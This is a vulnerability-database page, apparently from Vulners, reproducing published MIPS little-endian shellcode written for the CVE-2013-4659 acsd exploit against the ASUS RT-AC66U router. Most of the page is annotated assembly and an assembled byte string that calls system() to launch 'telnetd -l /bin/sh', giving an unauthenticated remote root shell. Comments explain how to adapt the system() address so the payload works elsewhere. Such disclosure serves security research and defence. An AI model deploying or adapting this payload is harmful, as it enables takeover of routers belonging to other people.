Vulners
Lucene search
MIPS Little Endian Shellcode
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | ASUS RT-AC66U acsd Param - Remote Root Shell Exploit | 27 Jul 201300:00 | – | zdt |
 | CVE-2013-4659 | 14 Mar 201709:02 | – | cve |
 | CVE-2013-4659 | 14 Mar 201709:02 | – | cvelist |
 | MIPS Little Endian Shellcode | 27 Jul 201300:00 | – | exploitdb |
| ASUS RT-AC66U - 'acsd' Remote Command Execution | 27 Jul 201300:00 | – | exploitdb |
 | ASUS-RT-AC66U-acsd-Param | 4 Jan 201517:33 | – | exploitpack |
| ASUS RT-AC66U - acsd Remote Command Execution | 27 Jul 201300:00 | – | exploitpack |
 | CVE-2013-4659 | 14 Mar 201709:59 | – | nvd |
 | ASUS RT-AC66U ACSD Remote Root Buffer Overflow | 26 Jul 201300:00 | – | packetstorm |
 | Buffer overflow | 14 Mar 201709:59 | – | prion |
10
# Disassembled MIPS Little Endian Shellcode
# Shellcode was designed for ACSD exploit on the ASUS RT-AC66U SOHO router.
# CVE: CVE-2013-4659
# Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators
# Blog: http://infosec42.blogspot.com
# Company Website: http://securityevaluators.com
#
# NOTE:
# In order to use this MIPS ASM elsewhere, you will need to change the address
# of the system() function call to match your environment and reassemble the ASM.
# _ characters in the comments below represent a space.
lui t0,0x6e6c //Loading Upper Immediate nl into temp. reg. #0
ori t0,t0,0x6574 //Bitwise OR immediate. Putting et into lower 16 bits of t0
sw t0,-20(sp) //Store word pointer to command string for execution
lui t1,0x2064 //Loading Upper Immediate _d into temp. reg. #1
ori t1,t1,0x7465 //Bitwise OR immediate. Putting te into lower 16 bits of t0
sw t1,-16(sp) //Store next part of command
lui t2,0x2f20 //Loading Upper Immediate /_ into temp. reg. #2
ori t2,t2,0x6c2d //Bitwise OR immediate. Putting l- into lower 16 bits of t1
sw t2,-12(sp) //Store next part of command
lui t3,0x2f6e //Loading Upper Immedate /n into temp. reg. #3
ori t3,t3,0x6962 //Bitwise OR immediate. Putting ib into lower 16 bits of t2
sw t3,-8(sp) //Store next part of command
li t4,26739 //Loading Immediate hs00 into temp. reg. #4
sw t4,-4(sp) //Store next part of command
addi a0,sp,-20 //Store "telnetd -l /bin/sh" in reg. a0 for system() function call
addi sp,sp,-20 //Move stack pointer to "telnetd -l /bin/sh" string on the stack
lui t9,0x2ab4 //Loading Upper Immediate of system() into t9
ori t9,t9,0xf050 //Bitwise OR immediate. Putting rest of system() into t9
jalr t9 //Jumpying to t9/system()
andi at,k1,0x4132 //Filler instruction for branch delay
# NOTE: Assembled shellcode
#
# #80 Bytes system() Shellcode by Jacob Holcomb of ISE
# #Calling system() and executing telnetd -l /bin/sh
# shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
# shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
# shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
# shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
# shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
# shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
# shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
# shellcode += "\x41\x61\x33"
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.11534